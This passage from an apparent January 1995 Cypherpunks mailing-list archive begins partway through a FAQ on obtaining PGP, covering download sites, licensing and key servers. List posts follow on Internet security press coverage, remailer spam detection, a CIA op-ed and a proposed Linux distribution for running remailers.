  /pub/crypto/pgp
ftp.csua.berkeley.edu
  /pub/cypherpunks/pgp (DOS, MAC)
ftp.demon.co.uk
  /pub/amiga/pgp
  /pub/archimedes
  /pub/pgp
  /pub/mac/MacPGP
ftp.informatik.tu-muenchen.de
ftp.funet.fi
ftp.dsi.unimi.it
  /pub/security/crypt/PGP
atari.archive.umich.edu
  /pub/atari/Utilities/pgp261st.zip (Atari)
ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon)
  /pub/atari/misc/pgp/pgp261b.lzh
wuarchive.wustl.edu
  /pub/aminet/util/crypt
src.doc.ic.ac.uk (Amiga)
  /aminet
  /amiga-boing
ftp.informatik.tu-muenchen.de
  /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2)
iswuarchive.wustl.edu
  pub/aminet/util/crypt (Amiga)
nic.funet.fi (128.214.6.100)
  /pub/crypt
ftp.uni-kl.de (131.246.9.95)
  /pub/aminet/util/crypt
qiclab.scn.rain.com (147.28.0.97)
pc.usl.edu (130.70.40.3)
leif.thep.lu.se (130.235.92.55)
goya.dit.upm.es (138.4.2.2)
tupac-amaru.informatik.rwth-aachen.de (137.226.112.31)
ftp.etsu.edu (192.43.199.20)
pencil.cs.missouri.edu (128.206.100.207)
ftp.csua.berkeley.edu
kauri.vuw.ac.nz
nctuccca.edu.tw
  /PC/wuarchive/pgp/
ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz Also, try an archie search for PGP. FTPMAIL For those individuals who do not have access to FTP, but do have access to e-mail, you can get FTP files mailed to you. For information on this service, send a message saying "help" to ftpmail at decwrl.dec.com. Another e-mail service is from nic.funet.fi. Send mail to mailserv at nic.funet.fi with the word HELP. For the ftp sites on netcom, send mail to ftp-request at netcom.com containing the word HELP in the body of the message. To get pgp 2.6.i by email: Send a message to hypnotech-request at ifi.uio.no with your request in the Subject: field. Subject What you will get GET pgp26i.zip MS-DOS executable (uuencoded) GET pgp26is.zip MS-DOS source code (uuencoded) GET pgp26is.tar.gz UNIX source code (uuencoded) For FAQ information, send e-mail to mail-server at rtfm.mit.edu with send usenet/news.answers/ftp-list/faq in the body of the message. MACPGP OPTIONS There are multiple parallel efforts to write an up-to-date MacPGP. See the following for the latest MacPGP beta stuff. Zbigniew Fiedorowicz has updated his MacPGP to support Apple events, and his distribution comes with complete source code. Grady's netcom directory contains a different version, about which he says "This latest bug release beta 1.23 fixes several relatively minor bugs. Source to this version is NOT available, so its use should be restricted to experimentation only." ftp://ftp.csn.net/mpj/README.MPJ ftp://ataxia.res.wpi.edu/pub/mac-pgp/README ftp://highway.alinc.com/users/jordyn/mac-pgp/README ftp://ftp.netcom.com/pub/gr/grady/PGP/MacPGP262b1.23.seq.hqx.asc PGP FOR WINDOWS, WINDOWS NT, AND WINDOWS 95 There isn't one, yet, that I know of (at least not a true native Windows application). There are several good shells that call the DOS PGP for the actual work, though. I use Viacrypt's, but there are others available as shareware or freeware at most of the sites listed above for PGP itself. 
IS MY COPY OF PGP GOOD?

If you find a version of the PGP package that does not include the PGP User's Guide, something is wrong. The manual should always be included in the package. PGP should be signed by one of the developers (Philip Zimmermann, Jeff Schiller, Viacrypt, Stale Schumacher, etc.).

OTHER PGP DOCUMENTATION

For more information on the "time bomb" in PGP, see ftp://ftp.csn.net/mpj/pgpbomb.asc
More PGP details are at http://www.pegasus.esprit.ec.org/people/arne/pgp.html
Windows shells documentation http://www.LCS.com/winpgp.html
Watch for the full PGP FAQ on alt.security.pgp.

LANGUAGE MODULES

These are suitable for most PGP versions. I am not aware of any export/import restrictions on these files.

German
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha

Italian
* _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
* _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

Japanese
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

Lithuanian
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

Russian
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
* _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

Spanish
* _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
* _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz

Swedish
* _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
* _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt

MAILING LIST FOR PGP AND RELATED TOPICS (PGP MAILING LIST IN GERMAN)

The list address: pgp-friends at fiction.pb.owl.de
The *request* address (for subscribe/unsubscribe and other administrative matters): pgp-friends-request at fiction.pb.owl.de

WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS?

For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip

WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA?

MIT PGP is only for personal, noncommercial use because of restrictions on the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA algorithm. PKP/RSADSI insist that we use RSAREF instead of the mpi library for reasons that make sense to them.

For commercial use, use Viacrypt PGP, which is fully licensed to use both the RSA and IDEA algorithms in commercial and corporate environments (as well as personal use, of course).

Another restriction is due to an exclusive marketing agreement between Philip Zimmermann and Viacrypt that applies to the USA and Canada only. Viacrypt has exclusive rights to market PGP commercially in this area of the world. This means that if you want to market PGP commercially in competition with Viacrypt in the USA or Canada, you would have to create a new implementation of the functions of PGP containing none of Philip Zimmermann's copyrighted code. You are free to modify existing PGP code for your own use, as long as you don't sell it. Phil would also appreciate your checking with him before you distribute any modified versions of PGP as freeware.

"PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks owned by Philip Zimmermann. This means that if you modify an older version of PGP that was issued under the copyleft license and distribute it without Phil's permission, you have to call it something else. This avoids confusing all of us and protects Phil's good name.

WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA?

MIT PGP is only for noncommercial use because of restrictions on the licensing of the IDEA algorithm.
Because the RSA algorithm isn't patented in Canada, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license associated with the RSAREF copyright, which is valid in Canada.

For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA algorithm in commercial and corporate environments.

The exclusive marketing agreement with Viacrypt also applies in Canada. See the section on USA intellectual property restrictions for more details.

WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA?

MIT PGP is only for noncommercial use in areas where there is a patent on software implementations of the IDEA algorithm. Because the RSA algorithm isn't patented outside of the USA, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license restrictions. The RSAREF copyright holds outside of the USA, even though the RSA patent does not.

The IDEA conventional block cipher is covered by US Patent 5,214,703 and European patent EP 0 482 154 B1. IDEA is a trademark of Ascom-Tech AG. Commercial users of IDEA (including commercial use of PGP) may obtain licensing details from Ph. Baumann, IDEA Lizenz Ascom Tech AG Postfach 151 CH-4502 Solothurn Switzerland Tel ++41 65 242828, Fax ++41 65 242847.

WHAT IS COMMERCIAL USE?

Use some common sense. If you are running a business and using PGP to protect credit card numbers sent to you electronically, then you are using PGP commercially. Your customers, however, need not buy the commercial version of PGP just to buy something from you, if that is the only commercial use they make of PGP (since they are spending, not making, money with PGP). If you are just encrypting love letters or other personal mail (for which you don't get paid) on your own personal computer, that is not commercial. If you are encrypting official business mail on your for-profit corporation's computer with PGP, that is commercial use.
Note that there are some gray areas not covered above, and the patent owners of RSA and IDEA may differ from my interpretation in the areas not covered above, so if you are in doubt, you should consider the licensing of Viacrypt PGP (or outside of North America, direct licensing of IDEA) to be cheap legal insurance. Indeed, the license fee is probably a lot cheaper than a legal opinion from a lawyer qualified to make such a judgement. Note that I am not a lawyer and the above is not legal advice. Use it at your own risk.

ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS?

If your RSA key modulus length is less than or equal to 1024 bits (I don't recommend less, unless you have a really slow computer and little patience), and if your key was generated in the PKCS format, then it will work with any of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If this is not the case, you really should generate a new key that qualifies.

MIT PGP 2.6.2 should be able to use 2048 bit keys. Generation of 2048 bit keys was supposed to automatically be enabled in PGP 2.6.2 in December, 1994, but a bug caused the actual key limit to be 2047 bits.

MORE WORLD WIDE WEB URLs

http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html
http://draco.centerline.com:8080/~franl/pgp/pgp.html
http://draco.centerline.com:8080/~franl/crypto/cryptography.html
http://www.pegasus.esprit.ec.org/people/arne/pgp.html
http://rschp2.anu.edu.au:8080/crypt.html
http://ibd.ar.com/PublicKeys.html
http://www.ifi.uio.no/~staalesc/PGPversions.html

WINDOWS SHELLS

Several shells for running PGP with Microsoft Windows are available at the same places PGP can be found.

MACPGP KIT

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx

BUGS

See the documentation that comes with PGP in the latest versions for bugs in the older versions.
The latest versions of PGP may not fully wipe all traces of plain text from a file when given the -w option. For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM For information on this service, send mail to certify at bellcore.com with the subject help, or check http://info.bellcore.com/BETSI/betsi.html INTEGRATING PGP AND PINE Send blank e-mail to slutsky at lipschitz.sfasu.edu with Subject: mkpgp to get a c-shell script to interface PGP and Pine. Send a second message with Subject: addtomkpgplist if you want updates sent you automatically. HOW DO I PUBLISH MY PGP PUBLIC KEY? There are lots of ways. One way is to use a key server. Send mail to one of these addresses with the single word "help" in the subject line to find out how to use a key server. pgp-public-keys at pgp.iastate.edu pgp-public-keys at pgp.mit.edu pgp-public-keys at pgp.ai.mit.edu public-key-server at pgp.ai.mit.edu pgp-public-keys at cs.tamu.edu pgp-public-keys at chao.sw.oz.au pgp-public-keys at jpunix.com pgp-public-keys at dsi.unimi.it pgp-public-keys at kiae.su pgp-public-keys at fbihh.informatik.uni-hamburg.de There is also an experimental public key server at http://ibd.ar.com/PublicKeys.html There is an excellent commercial key certification and publication service, too. For $20/year or so, you can have your key officially certified and published in a "clean" key database that is much less susceptible to denial-of-service attacks than the other key servers. People need not pay any fees to retrieve keys so published. Send mail to info-pgp at Four11.com for information, or look at http://www.Four11.com/ You can also mail your key to pgp-public-keys at c2.org, and it will be posted to the subscribers of that mailing list, sent to the keyservers, and posted to alt.security.keydist. To subscribe to the mailing list, send a message to majordomo at c2.org with "subscribe pgp-public-keys" in the body of the message. 
Another way is to upload it to the PGP public keys area of the Colorado Catacombs BBS (303-772-1062). Another way is to just send it to your correspondents. You could add it to your .plan file so that finger returns your key. You could add it to some of your postings. No matter which way you do it, you should have your key signed by someone who verifies that your key belongs to you, so that you don't have someone else generating a key that has your name on it, but that isn't yours. Here is my public key:
TIME STAMP SERVICES Mail sent to Time S. Tamp will be returned, signed with its own private key. REPRODUCING THIS FAQ Permission is granted to distribute unmodified copies of this FAQ. To get the latest version of this FAQ, get ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to ftp-request at netcom.com with the line SEND mp/mpj/getpgp.asc in the body of the message, or send blank mail to mpjohnso at nyx.cs.du.edu. This FAQ is also archived at rtfm.mit.edu with a very long file name. There are many other frequently asked questions. Most of them are covered in the documentation that comes with PGP or in one of the books about PGP. Send corrections to mpj at netcom.com. I regret that I lost some of the corrections people sent me on the last round of this FAQ, so if I missed yours, please send it again. Thanks.
Michael Paul Johnson   Colorado Catacombs BBS 303-772-1062
mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org
ftp://ftp.csn.net/mpj/README.MPJ   CIS: 71331,2332
ftp://ftp.netcom.com/pub/mp/mpj/README   -. --- ----- ....

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAgUBLxvrHPX0zg8FAL9FAQHz9AQAjdyLzJ2L+PSkqL0nZ4ULiq4ReHdYfLrX
DlBvkM9JG0jCgpDmcWkWg4IEUwJ8VoKnjFYaUgbw3CkCoIZYRekXrUkRgoZSq5TV
BdADxEXJabF7It3e6jH2ICVNSYdsfe/4xh+8F7v7CKzSZubtwaLOIbZ+CSBVi3D0
3iyn6+zrZVo=
=5zak
-----END PGP SIGNATURE-----

From anonymous-remailer at shell.portal.com Thu Jan 19 08:20:17 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 19 Jan 95 08:20:17 PST
Subject: internet mag
Message-ID: <199501191620.IAA22714@jobe.shell.portal.com>

This month's issue of Internet World Magazine deals primarily with internet security. I'm not going to review everything in the mag but I'll list the table of contents:

Better Safe: Danger lurks on the Info Highway. You must take precaution to reduce your risks. By Dave Taylor and Rosalind Resnick

Getting Cryptic: Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it. By William Stallings. (Introductory article about PGP. Nothing we, here, don't already know)

Securing the Enterprise: Connecting your corporation to the Internet can be a security nightmare. Firewalls are the main line of defense. By Alton Hoover (An overview of Firewalls, application-layer gateways and token-based authentication schemes)

Beyond the Firewall: The latest firewall technology not only detects intruders, but strikes back. By Winn Schwartau (Very interesting article. Here are some quotes to whet your appetite:

Wouldn't it be nice if a computer system attacked from the Internet responded to the attack by striking back at the intruder? This is exactly what Sidewinder's implementation of type enforcement does.....It will detect the intrusion immediately....As soon as a violation occurs, a silent alarm is activated....sidewinder can be configured to react in any number of ways, once an attack has been detected...it can shut the intruder cold...(or)...it can invoke a mechanism that would record all the information from whence came the attack....By luring the attacker into a false sense of security, the hacker would continue trying to break in, unaware that every step was being recorded...

Cashing In: As Internet commerce expands, a host of companies are vying to establish their system as the basis for cyberbanking and credit-card transactions. By Lisa Morgan

Business Browser: New versions of Mosaic with built-in encryption promise to keep your transactions safe. By Richard W. Wiggins

Unlawful Entry: Crackers can feast on your data if you fail to plug your leaky Unix system. By Aaron Weiss (Five Ways to crack a Unix System)

It's Alive: Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on. By Steven Vaughan-Nichols

Building Trust: The chief executives of Trusted Information Systems -Steve Crocker and Steve Walker- talk about encryption, CyberCash, Clipper, and more. By Jeff Ubois.

All in all a rather interesting mag. Check it out.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard at alpha.c2.org
Give me the liberty to know, to utter, and to argue freely according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From pcw at access.digex.com Thu Jan 19 08:39:36 1995
From: pcw at access.digex.com (Peter Wayner)
Date: Thu, 19 Jan 95 08:39:36 PST
Subject: Anonyous Cash through Options Trading
Message-ID:

Several months ago, there was a discussion at length about how one could use the futures and options markets to transfer funds anonymously. This week's edition of Forbes magazine (Jan 30, 95) has the headline, "OIL! GUNS! GREED! Was Chase Manhattan ripped off by arms traffickers?"

In the story, Forbes guesses that some suspiciously large losses in the options market could have been a smoke screen for money laundering:

Oil traders do big business in unlisted options, providing a further smoke screen. Perkins points to deals in which Harris would buy a put option on a cargo of crude from a friendly counterpart like Bayoil and resell a similar contract in the oil market. If oil prices climbed, the put would expire worthless and Bayoil would pocket the price of the option, while Arochem would break even. If oil prices dropped, and the ultimate buyer exercised the put, Arochem could absorb the loss while conveniently neglecting to exercise its put against Bayoil, Perkins theorizes. (pg 87)

From jalicqui at prairienet.org Thu Jan 19 08:45:58 1995
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 08:45:58 PST
Subject: JP vs Homer
Message-ID: <9501191645.AA26767@firefly.prairienet.org>

> We are capable of controlling mail bombs, for instance, in the
>following way:
>
> Take an incoming message, capture From: line. Strip header. MD5 body.
>Add to sorted table [From: MD5(message) date]. Check for repetition of
>first two fields. If reps = 1, forward message. If reps = 2, send message
>to From: "Possible error. Two copies of message received." If
>reps = 0 mod 5, send letter to postmaster at From:. "Possible mailbomb or
>spam. copies of received from at your site in the
>past week." Clear table of entries more than a week old every midnight.
>
>
> If all remailers did this, then no matter where the net was entered,
>the messages would be rejected. And spammers/bombers would be spamming/
>bombing their own postmaster. Probably a bad idea. If not all did it,
>then add special handling to hit remailer-operator at . This would encourage
>the operator to auto-magically handle the spam-bomb himself.

This works only if one assumes that the exact same message is posted using the exact same path. Granted, it would probably be effective for novice spammers.

Consider a premail/chain type script and a cleartext spam message. The script is executed once every five minutes, say. When it runs, it creates a new random path through the remailers, adding encryption wrappers for each hop. Your spam detector would miss this one completely unless your remailer was used as the terminal remailer for a significant number of spams.

More significantly, the MD5 hashes of each message would be different even if the same path were used more than once because the PGP session key would be different (again, unless your remailer would be the terminal remailer in the particular path that repeated).

From jya at pipeline.com Thu Jan 19 09:09:32 1995
From: jya at pipeline.com (John Young)
Date: Thu, 19 Jan 95 09:09:32 PST
Subject: WSJ on CIA Dump
Message-ID: <199501191708.MAA20858@pipe4.pipeline.com>

The Wall Street Journal
January 18, 1995, p. A14.

Get Smart -- Eliminate the CIA

By Angelo Codevilla

Over the past several years, U.S. intelligence agencies in general and the CIA in particular have proved themselves incompetent in peacetime and of little use in conflict. Stripped of their mystique and lacking the capacity to reform themselves, these organizations are virtually in receivership.

The maladies ailing the intelligence community are numerous. Independent quality control was never more than a pretense, and competition among intelligence agencies was nonexistent.
Producers of intelligence -- rather than the soldiers and diplomats who have to use it -- have also become its judges. All this has spawned a complex of habits, procedures, mentalities and people too entrenched to be repaired and too noxious for any part to form the nucleus of a new, healthy system. Hence, we should take Sen. Daniel Patrick Moynihan's advice, and rethink our intelligence from the ground up. A good place to start is with the fact that about half of the $28 billion U.S. intelligence budget pays for units directly controlled by military commanders, which routinely provide precise information for the armed forces' operations close to the front lines. The Treasury and State Departments also have their own intelligence units, which fit their needs quite well. So why do we need a national system headed by the CIA? The original justification for the creation of the CIA in 1947 was that intelligence would be best if its gathering and evaluation were divorced as much as possible from the operating departments of government -- State, Defense, etc. -- and placed under the president. This judgment has turned out to be wrong. Because presidents have relied on the CIA to run the system, the result has been a system dominated by the priorities of the producers -- not the users -- of intelligence. A basic failing is that the CIA has primary responsibility for intelligence and none at all for real world events. The CIA prefers to place its career employees in U.S. embassies, where they pretend to be employees of other parts of the government. Such "case officers" must acknowledge that they are gathering information for the U.S. Another disadvantage is that they don't speak foreign languages well. And unlike successful reporters, they virtually never know the substantive fields about which they are seeking information. 
Thus it is unsurprising that they are usually outdone in economic reporting by economic reporters, in military reporting by military reporters, and so forth. The Aldrich Ames case shows how much more highly the CIA values the smooth functioning of its system than what the system produces. Mr. Ames handed the KGB the capacity to shape the intelligence flowing to top U.S. officials during the endgame of the Cold War. Thus disinformation made presidents and secretaries of state more vulnerable to Gorbomania than the average citizen informed by newspaper accounts. How could the CIA fail to notice the fishiness of reports generated by a network controlled by the other side? The same way that, in the 1970s and 1980s, the agency had failed to notice that it was passing along reports from a network of agents in Cuba totally controlled by Castro's DGI, and from a network in East Germany all but a few of whose agents were working for the Stasi. In other words, while the Ames case was unusually destructive, it was a typical example of bureaucratic sclerosis. In the Gulf War, intelligence worsened the farther one got away from the front lines. The national system headed by the CIA misperceived the nature of Saddam Hussein's regime, failed to grasp the obvious signs of attack, and has yet to learn Saddam's military and political reasoning. Our imaging satellites failed to find mobile Scud launchers, and our communications intelligence antennas failed to shed light on the diplomatic intercourse between Saddam and the Soviets. National analysts misjudged Iraq's nuclear program, and were fooled by elementary camouflage. Gen. H. Norman Schwarzkopf's public belittling of CIA-run intelligence was matched by unprintable epithets from field commanders. 
What happened in the Gulf would have happened in any conflict because the intelligence community's cameras and antennas were conceived, and its people trained, on the CIA's assumption that cooperative competition with the Soviet Union would last forever and that the basic designs of weapons would not change. Thus cameras, for example, were optimized to take pictures of fixed installations rather than to keep track of attacking military forces or mobile missile launchers. Long before the Soviet collapse, however, it had become clear that the CIA made bad bets. The age of mobile missiles arrived long ago, and modern weapons are defined by the software they contain rather than by observable features. So what's the point of, for example, analyzing a radar signal that a computer can change in an instant? Divorce from operational responsibility also tends to make the reports that flow to top officials less valuable than the information used to compile them. (In any given subject, the CIA delivers a consensus of the system's several agencies. It takes far more time for a paper to go through the interagency process than for someone to write the paper. Considering the elementary errors and ignorance that often come out, it is clear that the conferees do not spend much time fact-checking. Intelligence analysts become spin doctors, concerned not with facts but with pushing policy makers in the direction of their parent agencies' prejudices. Hence the ultimate irony: A system whose ostensible reason for being was to eliminate from intelligence the parochial interests of tank drivers, diplomats, bomber pilots, etc. ended up aggregating the prejudices of the analysts -- prejudices unrelieved by the sobering prospect of having to carry out the policies they are pushing for. The CIA has maintained a monopoly on judging the quality of the system's operations and products. It does not heed presidents, much less their appointees. 
A decade ago, the agency ignored President Reagan's executive order to reorganize counterintelligence. Two decades ago, President Ford, shocked by how far intelligence estimates were diverging from reality, asked a group of distinguished outsiders (the B team) to see whether the intelligence community's data on Soviet nuclear forces could support conclusions different from those of the insider analysts. The B Team, despite resistance from the agency, came up with results far superior to the insider A Team's. A better intelligence system should be built on a model radically different from the 1947 original. Each of the major departments of the U.S. government (State, Defense, etc.) should be responsible for gathering and evaluating the information it needs to operate in the new world disorder. Intelligence, in short, should be franchised out to its consumers. There is reason to believe that the departments would do better without the CIA's tutelage than with it. In the past, the armed forces have asked to deploy officers who speak foreign languages, who could blend in with the local population, and who would be experts in the military fields on which they were reporting. U.S. military leaders have also clamored for satellites whose products they could use. Each time, the CIA made sure such requests were denied. If those requests had been granted, the country would be better informed. In all this there is a need for some central coordination. The several agencies have to mesh their quest for agents abroad, lest they stumble over each other. The information that any part of the government collects must be available to properly cleared people in all other parts, so that any and all analysis can be based on all the facts. Fortunately, maintaining a central registry nowadays requires computers, rather than the bureaucratic monster that arose a half century ago. Finally the president of the United States' own intelligence needs should be provided by his own staff. 
Among its duties should be to make sure that all the agencies get each others' estimates. The availability to the president and other top decision makers of contrasting estimates from throughout the government would stimulate better performance all around. So, while there is a role for a central intelligence agency in a system based on consumer sovereignty, there is none for the CIA. Mr. Codevilla, a fellow at the Hoover Institution, is the author of "Informing Statecraft" (Free Press, 1992). End From jya at pipeline.com Thu Jan 19 09:13:29 1995 From: jya at pipeline.com (John Young) Date: Thu, 19 Jan 95 09:13:29 PST Subject: BYTE on PGP WoT Message-ID: <199501191712.MAA21219@pipe4.pipeline.com> William Stallings writes in the BYTE February issue on "The PGP Web of Trust." From jalicqui at prairienet.org Thu Jan 19 09:17:01 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Thu, 19 Jan 95 09:17:01 PST Subject: The Remailer Crisis Message-ID: <9501191716.AA08891@firefly.prairienet.org> >For example, the Linux mavens could tell us if Linux-based remailer >boxes could be hung on dedicated connections to The Little Garden >network, as a specific example. A "black box remailer" such as several >folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be >buildable for under a grand. We could ask here for contributions, and >might even raise this amount of money. Then each of us who contributed >could have "accounts," maybe several of them. Imagine 100 or more >"remailers" all on this one machine--I'm deliberately ignoring the >security issue for now. Little Garden has stated categorically that >they will not tell users what they can or can't do with their machines >(though I can think of some cases where they might have to, as with >spamming, etc.). Anyway, you can see where I'm headed. The "Linux mavens" followed by the "black box" stuff sparked an idea... 
First, before delving into dreamland: I'm sure Linux could be hung off just about any store-and-forward (a la UUCP) or TCP/IP-based network there is with a minimum of trouble. Linux junkies are familiar with the concept of "distributions". For the uninitiated, Linux itself is just a kernel; Linus Torvalds doesn't hold anyone's hand when it comes to actually turning that kernel into a working system. As a result, people have done this job themselves: they build their own working systems painstakingly from scratch and then archive it off to disk or CD-ROM, which they sell or give away. Most of the time, when you get Linux, you're actually getting one of these "distributions" of Linux, complete with all the frills that don't come with the kernel (like the shell, basic utils, and so on). Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk" distribution (if ya don't like the name, make up yer own!). This would be a bare minimum of a distribution, with nothing fancy: bash, misc. utils like ls, etc. This can fit (tightly) in 20 MB. The supplied kernel would have every networking option under the sun turned on, but would be otherwise bare of frills as well. Now let's add minimal network utils (telnet and telnetd for connecting and sendmail for obvious reasons), perl, PGP, and a remailer package. To make it as easy as possible, I'd use the UMSDOS filesystem, so that Linux could be installed on a DOS machine without any reformatting, repartitioning, or similar headaches. We could make this available via FTP or press some CD-ROMs if we were ambitious. Better yet, the cool Linux thing to do now is to install via NFS; this makes installing Linux as easy as sticking in a boot disk and pointing the install program at the NFS server (well, not quite, but pretty close). 
After adding in the cute little install program (like the Slackware distribution already has) and some boot options, you'd have an "instant remailer" software package, able to transform any 386SX/4MB RAM DOS machine or better into a Linux-based remailer site, complete with aliases, logging policies, etc. already configured for you. I bet even Tim May could install this if it were done right. :-) So, am I dreaming, or does this sound viable to y'all? From tcmay at netcom.com Thu Jan 19 10:51:01 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 10:51:01 PST Subject: The Remailer Crisis In-Reply-To: <9501191716.AA08891@firefly.prairienet.org> Message-ID: <199501191847.KAA28985@netcom15.netcom.com> Jeff's response is exactly what I was hoping for! The "Cypherpunks distribution" version of Linux would be a great way to spread cheap remailer technology on cheap Linux boxes. Hell, I might even augment my Macs with one of these things! Jeff Licquia wrote: > The "Linux mavens" followed by the "black box" stuff sparked an idea... > > First, before delving into dreamland: I'm sure Linux could be hung off just > about any store-and-forward (a la UUCP) or TCP/IP-based network there is > with a minimum of trouble. This is what I'd expect....I just don't know the details. > Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk" > distribution (if ya don't like the name, make up yer own!). This would be a > bare minimum of a distribution, with nothing fancy: bash, misc. utils like > ls, etc. This can fit (tightly) in 20 MB. The supplied kernel would have > every networking option under the sun turned on, but would be otherwise bare > of frills as well. Now let's add minimal network utils (telnet and telnetd > for connecting and sendmail for obvious reasons), perl, PGP, and a remailer > package. 
To make it as easy as possible, I'd use the UMSDOS filesystem, so > that Linux could be installed on a DOS machine without any reformatting, > repartitioning, or similar headaches. A great idea. This could be the "remailer in a box" we've been talking about for a long time. Could also include a package of security and crypto utilities, etc. Sort of what the "Gnu" folks might do if they were involved in crypto. (By "involved in crypto" I mean of course Cypherpunks sorts of concerns, which Stallman seems to have not much interest in, at least publicly.) > We could make this available via FTP or press some CD-ROMs if we were > ambitious. Better yet, the cool Linux thing to do now is to install via NFS; > this makes installing Linux as easy as sticking in a boot disk and pointing > the install program at the NFS server (well, not quite, but pretty close). > After adding in the cute little install program (like the Slackware > distribution already has) and some boot options, you'd have an "instant > remailer" software package, able to transform any 386SX/4MB RAM DOS machine > or better into a Linux-based remailer site, complete with aliases, logging > policies, etc. already configured for you. I bet even Tim May could install > this if it were done right. :-) Well, if I take the other side of the bet, that I *can't*, is that kosher? > So, am I dreaming, or does this sound viable to y'all? Sounds very good to me. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. 
FAQ available at ftp.netcom.com in pub/tc/tcmay From perry at imsi.com Thu Jan 19 11:14:28 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 19 Jan 95 11:14:28 PST Subject: (none) In-Reply-To: <199501181607.IAA08201@largo.remailer.net> Message-ID: <9501191913.AA04532@snark.imsi.com> Eric Hughes says: > Why sendmail doesn't have anti-spam protection at this point is beyond > me. Denial of email service to one user should not deny service to > all others. I consider broken any email system that crashes a machine > because of a disk partition filling. As a mail administrator for many years, I've never seen a site crash because of a filling disk partition due to mail overload. I've seen Sendmail shut itself down temporarily, but that's to be expected. As for the question of mail overload for one user harming the others, it's a design decision. The only alternative is to produce quotas for mail delivery, which at most of the places I run would be a very bad thing. Strictly speaking, sendmail has nothing to do with local delivery and isn't in a position to do any of this anyway -- but it's easy enough to change the local mailer (which is not part of sendmail) to do quotas if you like. Perry From xpat at vm1.spcs.umn.edu Thu Jan 19 11:24:54 1995 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Thu, 19 Jan 95 11:24:54 PST Subject: Remailer-on-a-CD Message-ID: <9501191924.AA17670@toad.com> >The "Linux mavens" followed by the "black box" stuff sparked an idea... >package. To make it as easy as possible, I'd use the UMSDOS filesystem so >that Linux could be installed on a DOS machine without any reformatting >repartitioning, or similar headaches. >distribution already has) and some boot options, you'd have an "instant >remailer" software package, able to transform any 386SX/4MB RAM DOS machine >or better into a Linux-based remailer site, complete with aliases, logging >So, am I dreaming, or does this sound viable to y'all? 
